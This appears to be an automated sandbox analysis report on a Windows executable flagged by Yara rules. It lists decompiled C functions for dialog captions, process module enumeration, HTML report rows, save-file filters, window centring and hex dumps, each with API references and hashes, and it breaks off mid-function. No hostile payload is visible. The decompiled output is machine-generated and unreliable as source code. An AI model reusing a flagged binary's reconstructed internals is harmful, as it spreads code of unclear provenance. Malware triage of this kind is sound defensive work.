                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E00407D0A(void* __eflags, struct HWND__* _a4) {
                                                  				void _v4103;
                                                  				char _v4104;
                                                  				void* _t8;
                                                  				void* _t17;
                                                  
                                                  				_t8 = E004118A0(0x1004, _t17);
                                                  				_t21 =  *0x4171b8;
                                                  				if( *0x4171b8 != 0) {
                                                  					_v4104 = 0;
                                                  					memset( &_v4103, 0, 0x1000);
                                                  					sprintf(0x4172c0, "dialog_%d",  *0x417300);
                                                  					if(E00407DE5(_t17, _t21, "caption",  &_v4104) != 0) {
                                                  						SetWindowTextA(_a4,  &_v4104);
                                                  					}
                                                  					return EnumChildWindows(_a4, E00407CAD, 0);
                                                  				}
                                                  				return _t8;
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 00407D35
                                                  • sprintf.MSVCRT ref: 00407D4A
                                                    • Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
                                                    • Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
                                                    • Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45
                                                  • SetWindowTextA.USER32(?,?), ref: 00407D71
                                                  • EnumChildWindows.USER32 ref: 00407D81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                  • String ID: caption$dialog_%d
                                                  • API String ID: 246480800-4161923789
                                                  • Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                  • Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
                                                  • Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                  • Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 35%
                                                  			E0040E255(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
                                                  				void* _v8;
                                                  				signed int _v12;
                                                  				unsigned int _v16;
                                                  				int _v20;
                                                  				intOrPtr _v28;
                                                  				char _v32;
                                                  				intOrPtr _v40;
                                                  				intOrPtr _v44;
                                                  				char _v308;
                                                  				intOrPtr _v312;
                                                  				void _v316;
                                                  				void _v579;
                                                  				char _v580;
                                                  				char _v844;
                                                  				intOrPtr _v1104;
                                                  				intOrPtr _v1108;
                                                  				intOrPtr _v1112;
                                                  				char _v1132;
                                                  				char _v17516;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t63;
                                                  				void* _t64;
                                                  				void* _t77;
                                                  				intOrPtr _t84;
                                                  				void _t94;
                                                  				int _t102;
                                                  				void* _t106;
                                                  				void* _t107;
                                                  
                                                  				E004118A0(0x446c, __ecx);
                                                  				_t102 = 0;
                                                  				_v20 = 0;
                                                  				if(E0040629C() == 0 ||  *0x417518 == 0) {
                                                  					if( *0x417514 != _t102) {
                                                  						_t94 = _a4;
                                                  						_t63 =  *0x416fe0(8, _t94);
                                                  						_v8 = _t63;
                                                  						if(_t63 != 0xffffffff) {
                                                  							_v20 = 1;
                                                  							_v1132 = 0x224;
                                                  							_t64 =  *0x416fd8(_t63,  &_v1132);
                                                  							while(_t64 != 0) {
                                                  								memset( &_v316, _t102, 0x118);
                                                  								_v312 = _v1104;
                                                  								_v316 = _t94;
                                                  								strcpy( &_v308,  &_v844);
                                                  								_v44 = _v1108;
                                                  								_t107 = _t107 + 0x14;
                                                  								_v40 = _v1112;
                                                  								_v1132 = 0x224;
                                                  								if(E0040E45F(_a8,  &_v316) != 0) {
                                                  									_t64 =  *0x416fd4(_v8,  &_v1132);
                                                  									continue;
                                                  								}
                                                  								goto L18;
                                                  							}
                                                  							goto L18;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					_t77 = OpenProcess(0x410, 0, _a4);
                                                  					_v8 = _t77;
                                                  					if(_t77 != 0) {
                                                  						_push( &_v16);
                                                  						_push(0x4000);
                                                  						_push( &_v17516);
                                                  						_push(_t77);
                                                  						if( *0x416fe4() != 0) {
                                                  							_t6 =  &_v16;
                                                  							 *_t6 = _v16 >> 2;
                                                  							_v20 = 1;
                                                  							_v12 = 0;
                                                  							if( *_t6 != 0) {
                                                  								while(1) {
                                                  									_v580 = 0;
                                                  									memset( &_v579, _t102, 0x104);
                                                  									memset( &_v316, _t102, 0x118);
                                                  									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
                                                  									_t107 = _t107 + 0x18;
                                                  									_v316 = _a4;
                                                  									_v312 = _t84;
                                                  									 *0x416fdc(_v8, _t84,  &_v580, 0x104);
                                                  									E0040E172( &_v308,  &_v580);
                                                  									_push(0xc);
                                                  									_push( &_v32);
                                                  									_push(_v312);
                                                  									_push(_v8);
                                                  									if( *0x416fe8() != 0) {
                                                  										_v44 = _v28;
                                                  										_v40 = _v32;
                                                  									}
                                                  									if(E0040E45F(_a8,  &_v316) == 0) {
                                                  										goto L18;
                                                  									}
                                                  									_v12 = _v12 + 1;
                                                  									if(_v12 < _v16) {
                                                  										_t102 = 0;
                                                  										continue;
                                                  									} else {
                                                  									}
                                                  									goto L18;
                                                  								}
                                                  							}
                                                  						}
                                                  						L18:
                                                  						CloseHandle(_v8);
                                                  					}
                                                  				}
                                                  				return _v20;
                                                  			}

Instruction addresses: 0x0040e25d 0x0040e265 0x0040e267 0x0040e271 0x0040e395 0x0040e39b 0x0040e3a1 0x0040e3aa 0x0040e3ad 0x0040e3c0 0x0040e3c7 0x0040e3cd 0x0040e44a 0x0040e3e2 0x0040e3ed 0x0040e401 0x0040e407 0x0040e412 0x0040e41b 0x0040e41e 0x0040e42b 0x0040e438 0x0040e444 0x00000000 0x0040e444 0x00000000 0x0040e438 0x00000000 0x0040e44a 0x0040e3ad 0x0040e283 0x0040e28c 0x0040e294 0x0040e297 0x0040e2a0 0x0040e2a1 0x0040e2ac 0x0040e2ad 0x0040e2b6 0x0040e2bc 0x0040e2bc 0x0040e2c0 0x0040e2c7 0x0040e2ca 0x0040e2d9 0x0040e2e2 0x0040e2e9 0x0040e2fb 0x0040e306 0x0040e30d 0x0040e311 0x0040e322 0x0040e328 0x0040e33a 0x0040e33f 0x0040e344 0x0040e345 0x0040e34b 0x0040e356 0x0040e35b 0x0040e361 0x0040e361 0x0040e375 0x00000000 0x00000000 0x0040e37b 0x0040e384 0x0040e2d7 0x00000000 0x00000000 0x0040e38a 0x00000000 0x0040e384 0x0040e2d9 0x0040e2ca 0x0040e44e 0x0040e451 0x0040e451 0x0040e297 0x0040e45e

                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040DD5F,00000000,00000000), ref: 0040E28C
                                                  • memset.MSVCRT ref: 0040E2E9
                                                  • memset.MSVCRT ref: 0040E2FB
                                                    • Part of subcall function 0040E172: strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                  • memset.MSVCRT ref: 0040E3E2
                                                  • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040E407
                                                  • CloseHandle.KERNEL32(00000000,0040DD5F,?), ref: 0040E451
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$strcpy$CloseHandleOpenProcess
                                                  • String ID:
                                                  • API String ID: 3799309942-0
                                                  • Opcode ID: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                  • Instruction ID: 14fca006082a3f7ea55a807dd49808cd12c96cdbdfea8439eb00a9ee5a281ce1
                                                  • Opcode Fuzzy Hash: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                  • Instruction Fuzzy Hash: A2512DB1900218ABDB10DF95DC85ADEBBB8FF44304F1045AAF609B6291D7749F90CF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 61%
                                                  			E00409369(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                  				signed int _v8;
                                                  				char* _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				char _v48;
                                                  				char _v68;
                                                  				void _v96;
                                                  				void* __edi;
                                                  				signed int _t51;
                                                  				char* _t53;
                                                  				char* _t63;
                                                  				intOrPtr* _t69;
                                                  				signed int _t70;
                                                  				char _t84;
                                                  				intOrPtr* _t91;
                                                  				signed int _t95;
                                                  				void* _t96;
                                                  				void* _t97;
                                                  
                                                  				_t69 = __ebx;
                                                  				_t70 = 6;
                                                  				memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
                                                  				_t97 = _t96 + 0xc;
                                                  				asm("movsw");
                                                  				asm("movsd");
                                                  				asm("movsd");
                                                  				asm("movsd");
                                                  				asm("movsd");
                                                  				asm("movsw");
                                                  				asm("movsb");
                                                  				E00405EFD(_a4, "<tr>");
                                                  				_t95 = 0;
                                                  				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
                                                  					do {
                                                  						_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
                                                  						_v8 = _t51;
                                                  						_t53 =  &_v96;
                                                  						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
                                                  							_t53 =  &_v48;
                                                  						}
                                                  						_t91 = _a8;
                                                  						_v28 = _v28 | 0xffffffff;
                                                  						_v24 = _v24 | 0xffffffff;
                                                  						_v20 = _v20 | 0xffffffff;
                                                  						_v16 = _v16 & 0x00000000;
                                                  						_v12 = _t53;
                                                  						 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
                                                  						E0040F071(_v28,  &_v68);
                                                  						E0040F09D( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
                                                  						 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
                                                  						_t63 =  *(_t69 + 0x50);
                                                  						_t84 =  *_t63;
                                                  						if(_t84 == 0 || _t84 == 0x20) {
                                                  							strcat(_t63, "&nbsp;");
                                                  						}
                                                  						E0040F126( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
                                                  						sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
                                                  						E00405EFD(_a4,  *(_t69 + 0x4c));
                                                  						_t97 = _t97 + 0x20;
                                                  						_t95 = _t95 + 1;
                                                  					} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
                                                  				}
                                                  				return E00405EFD(_a4, 0x412b1c);
                                                  			}

Instruction addresses: 0x00409369 0x00409373 0x0040937c 0x0040937c 0x0040937e 0x00409388 0x00409389 0x0040938a 0x0040938b 0x0040938c 0x00409396 0x00409397 0x0040939c 0x004093a3 0x004093a9 0x004093ac 0x004093b2 0x004093bd 0x004093c0 0x004093c2 0x004093c2 0x004093c5 0x004093c8 0x004093cc 0x004093d0 0x004093d4 0x004093de 0x004093e7 0x004093f1 0x00409407 0x00409417 0x0040941a 0x0040941d 0x00409421 0x0040942e 0x00409434 0x0040943e 0x00409450 0x0040945b 0x00409460 0x00409463 0x00409464 0x004093a9 0x0040947f

                                                  APIs
                                                    • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                    • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                  • strcat.MSVCRT(?,&nbsp;), ref: 0040942E
                                                  • sprintf.MSVCRT ref: 00409450
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWritesprintfstrcatstrlen
                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                  • API String ID: 3813295786-4153097237
                                                  • Opcode ID: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                  • Instruction ID: 5cc8281df9b45005db58bfc05dfa6f470ea1610febbae0d5d066e94f32a410cd
                                                  • Opcode Fuzzy Hash: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                  • Instruction Fuzzy Hash: 0C316B31900208AFCF15DF94C8869DE7BB6FF44310F1041AAFD11AB2E2D776AA55DB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 73%
                                                  			E00410A8A(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
                                                  				void* _v8;
                                                  				intOrPtr* _v12;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v288;
                                                  				intOrPtr _v800;
                                                  				char _v1568;
                                                  				char _v1824;
                                                  				intOrPtr _v1828;
                                                  				intOrPtr _v1840;
                                                  				intOrPtr _v1844;
                                                  				intOrPtr _v2100;
                                                  				intOrPtr _v2612;
                                                  				char _v3124;
                                                  				char _v3636;
                                                  				intOrPtr _v3640;
                                                  				void* _v5768;
                                                  				char _v5796;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				char* _t39;
                                                  				intOrPtr _t51;
                                                  				int _t60;
                                                  				intOrPtr* _t73;
                                                  				int _t76;
                                                  				void* _t80;
                                                  
                                                  				_t80 = __eflags;
                                                  				E004118A0(0x16a0, __ecx);
                                                  				_t39 = wcslen(_a8);
                                                  				_t2 =  &(_t39[1]); // 0x1
                                                  				_t76 = _t2;
                                                  				_push(_t76);
                                                  				L004115D0();
                                                  				_t60 = 0;
                                                  				_v8 = _t39;
                                                  				 *_t39 = 0;
                                                  				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
                                                  				_t77 =  &_v5796;
                                                  				E0040FE05( &_v5796, _t80);
                                                  				_v5796 = 0x4144ac;
                                                  				E004104BC( &_v3636);
                                                  				E004104BC( &_v1824);
                                                  				_t73 = _a4;
                                                  				_v3640 =  *((intOrPtr*)(_t73 + 4));
                                                  				_v12 = _t73;
                                                  				_a8 = strlen(_v8);
                                                  				E0040FF76(_t47, _t77);
                                                  				memcpy(_v5768, _v8, _a8);
                                                  				E00410081(_t77, _t80);
                                                  				_t51 =  *((intOrPtr*)(_t73 + 4));
                                                  				_v1840 = _t51;
                                                  				_v28 = _t51;
                                                  				if(_v2100 != 0 || _v2612 != 0) {
                                                  					if(_v1844 != _t60) {
                                                  						if(_v1568 != _t60) {
                                                  							E004060D0(0xff,  &_v3124,  &_v1568);
                                                  							_t73 = _a4;
                                                  							_v1828 = _v24;
                                                  							_t60 = 0;
                                                  						}
                                                  						 *((intOrPtr*)( *_t73))( &_v3636);
                                                  					}
                                                  				}
                                                  				if(_v288 != _t60 || _v800 != _t60) {
                                                  					if(_v32 != _t60) {
                                                  						 *((intOrPtr*)( *_t73))( &_v1824);
                                                  					}
                                                  				}
                                                  				_push(_v8);
                                                  				L004115D6();
                                                  				return E0040FEED( &_v5796);
                                                  			}

Instruction addresses: 0x00410a8a 0x00410a92 0x00410a9d 0x00410aa2 0x00410aa2 0x00410aa5 0x00410aa6 0x00410aad 0x00410ab8 0x00410abd 0x00410abf 0x00410ac5 0x00410acb 0x00410ad6 0x00410ae0 0x00410aeb 0x00410af0 0x00410af9 0x00410aff 0x00410b08 0x00410b0b 0x00410b1c 0x00410b26 0x00410b31 0x00410b34 0x00410b3a 0x00410b3d 0x00410b4d 0x00410b55 0x00410b69 0x00410b71 0x00410b75 0x00410b7b 0x00410b7b 0x00410b88 0x00410b88 0x00410b4d 0x00410b90 0x00410b9d 0x00410baa 0x00410baa 0x00410b9d 0x00410bac 0x00410baf 0x00410bc4

                                                  APIs
                                                  • wcslen.MSVCRT ref: 00410A9D
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                    • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
                                                    • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE38
                                                    • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE53
                                                    • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
                                                    • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FEA0
                                                  • strlen.MSVCRT ref: 00410B02
                                                    • Part of subcall function 0040FF76: ??3@YAXPAX@Z.MSVCRT ref: 0040FF81
                                                    • Part of subcall function 0040FF76: ??2@YAPAXI@Z.MSVCRT ref: 0040FF90
                                                  • memcpy.MSVCRT ref: 00410B1C
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                  • String ID:
                                                  • API String ID: 577244452-0
                                                  • Opcode ID: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                  • Instruction ID: 5b66efc9566b80317fa540751e9ebc59d69584110078b55da7be64cca713082c
                                                  • Opcode Fuzzy Hash: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                  • Instruction Fuzzy Hash: 44317672804219AFCF21EFA1C8809EDBBB5AF44314F1440AAE508A3251DB796FC4CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040AB54(void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                  				char _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				char* _v36;
                                                  				intOrPtr _v40;
                                                  				char* _v44;
                                                  				intOrPtr _v48;
                                                  				intOrPtr _v52;
                                                  				intOrPtr _v56;
                                                  				intOrPtr _v60;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				char _v72;
                                                  				void _v1095;
                                                  				char _v1096;
                                                  				void* __ebx;
                                                  				char _t29;
                                                  				intOrPtr _t32;
                                                  				intOrPtr _t35;
                                                  				void* _t39;
                                                  				void* _t52;
                                                  				char _t59;
                                                  				char* _t60;
                                                  				intOrPtr _t61;
                                                  
                                                  				_v1096 = 0;
                                                  				memset( &_v1095, 0, 0x3ff);
                                                  				_v8 = 0x747874;
                                                  				_t29 = E004078FF(0x1f5);
                                                  				_t59 = "*.txt";
                                                  				_v72 = _t29;
                                                  				_v68 = _t59;
                                                  				_v64 = E004078FF(0x1f6);
                                                  				_v60 = _t59;
                                                  				_v56 = E004078FF(0x1f7);
                                                  				_v52 = _t59;
                                                  				_t32 = E004078FF(0x1f8);
                                                  				_t60 = "*.htm;*.html";
                                                  				_v48 = _t32;
                                                  				_v44 = _t60;
                                                  				_v40 = E004078FF(0x1f9);
                                                  				_v36 = _t60;
                                                  				_v32 = E004078FF(0x1fa);
                                                  				_v28 = "*.xml";
                                                  				_t35 = E004078FF(0x1fb);
                                                  				_t61 = "*.csv";
                                                  				_v24 = _t35;
                                                  				_v20 = _t61;
                                                  				_v16 = E004078FF(0x1fc);
                                                  				_v12 = _t61;
                                                  				E0040684D( &_v1096,  &_v72, 8);
                                                  				_t52 = 7;
                                                  				_t39 = E004078FF(_t52);
                                                  				_t23 =  &_v8; // 0x747874
                                                  				return E00406680(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 0040AB74
                                                    • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                    • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                    • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74B04DE0), ref: 0040797A
                                                    • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                    • Part of subcall function 0040684D: memset.MSVCRT ref: 0040686D
                                                    • Part of subcall function 0040684D: sprintf.MSVCRT ref: 0040689A
                                                    • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068A6
                                                    • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068BB
                                                    • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068C9
                                                    • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068D9
                                                    • Part of subcall function 00406680: GetSaveFileNameA.COMDLG32(?), ref: 004066CF
                                                    • Part of subcall function 00406680: strcpy.MSVCRT(?,?), ref: 004066E6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                  • API String ID: 4021364944-3614832568
                                                  • Opcode ID: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                  • Instruction ID: 4d38638b85bcf07ffefc140bede2392a268d493de89ddae44be4c2da79bd640a
                                                  • Opcode Fuzzy Hash: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                  • Instruction Fuzzy Hash: B62101B2D442589ECB01FF99D8857DDBBB4BB04304F10417BE619B7282D7381A45CB5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E00406491(void* __edx, struct HWND__* _a4) {
                                                  				int _v8;
                                                  				struct tagRECT _v24;
                                                  				int _t17;
                                                  				void* _t36;
                                                  				struct HDC__* _t38;
                                                  
                                                  				_t36 = __edx;
                                                  				_t38 = GetDC(0);
                                                  				_t17 = GetDeviceCaps(_t38, 8);
                                                  				_v8 = GetDeviceCaps(_t38, 0xa);
                                                  				ReleaseDC(0, _t38);
                                                  				GetWindowRect(_a4,  &_v24);
                                                  				asm("cdq");
                                                  				asm("cdq");
                                                  				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
                                                  			}

                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 0040649C
                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
                                                  • ReleaseDC.USER32 ref: 004064BC
                                                  • GetWindowRect.USER32 ref: 004064C9
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: CapsDeviceWindow$MoveRectRelease
                                                  • String ID:
                                                  • API String ID: 3197862061-0
                                                  • Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                  • Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
                                                  • Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                  • Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E00403A8D(void* __ecx, void* __eflags, void* _a4, char* _a8) {
                                                  				long _v8;
                                                  				void _v8199;
                                                  				char _v8200;
                                                  				void _v24582;
                                                  				short _v24584;
                                                  
                                                  				E004118A0(0x6004, __ecx);
                                                  				_v24584 = 0;
                                                  				memset( &_v24582, 0, 0x3ffe);
                                                  				_v8200 = 0;
                                                  				memset( &_v8199, 0, 0x1fff);
                                                  				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
                                                  				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                  				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 00403AB2
                                                  • memset.MSVCRT ref: 00403ACB
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AE2
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403B01
                                                  • strlen.MSVCRT ref: 00403B13
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403B24
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                  • String ID:
                                                  • API String ID: 1786725549-0
                                                  • Opcode ID: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                  • Instruction ID: d8056d974a042835a8b53dd5956248081512f57f3cb7fafeec888b91cb2496ed
                                                  • Opcode Fuzzy Hash: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                  • Instruction Fuzzy Hash: 6A1161B244012CBEFB009B94DD85DEB77ADEF08354F0041A6B70AD2091D6349F94CB78
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E00406585(char* __edi, intOrPtr _a4, signed int _a8) {
                                                  				void _v259;
                                                  				char _v260;
                                                  				char* _t34;
                                                  				signed int _t35;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  
                                                  				_t34 = __edi;
                                                  				_v260 = 0;
                                                  				memset( &_v259, 0, 0xfe);
                                                  				_t37 = _t36 + 0xc;
                                                  				 *__edi = 0;
                                                  				_t35 = 0;
                                                  				do {
                                                  					_push( *(_t35 + _a4) & 0x000000ff);
                                                  					sprintf( &_v260, "%2.2X");
                                                  					_t37 = _t37 + 0xc;
                                                  					if(_t35 > 0) {
                                                  						strcat(_t34, " ");
                                                  					}
                                                  					if(_a8 > 0) {
                                                  						asm("cdq");
                                                  						if(_t35 % _a8 == 0) {
                                                  							strcat(_t34, "  ");
                                                  						}
                                                  					}
                                                  					strcat(_t34,  &_v260);
                                                  					_t35 = _t35 + 1;
                                                  				} while (_t35 < 0x80);
                                                  				return _t34;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: strcat$memsetsprintf
                                                  • String ID: %2.2X
                                                  • API String ID: 582077193-791839006
                                                  • Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                  • Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
                                                  • Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                  • Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E0040FEED(intOrPtr* __edi) {
                                                  				void* __esi;
                                                  				signed int _t9;
                                                  				intOrPtr* _t16;
                                                  				intOrPtr _t18;
                                                  				intOrPtr _t19;
                                                  				intOrPtr _t20;
                                                  				intOrPtr _t21;
                                                  				intOrPtr _t22;
                                                  
                                                  				_t16 = __edi;
                                                  				_t9 =  *(__edi + 0x1c);
                                                  				 *__edi = 0x414288;
                                                  				if(_t9 != 0) {
                                                  					_push(_t9);
                                                  					L004115D6();
                                                  					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
                                                  				}
                                                  				_t18 =  *((intOrPtr*)(_t16 + 0x460));
                                                  				if(_t18 != 0) {
                                                  					_t9 = E00406B5B(_t18);
                                                  					_push(_t18);
                                                  					L004115D6();
                                                  				}
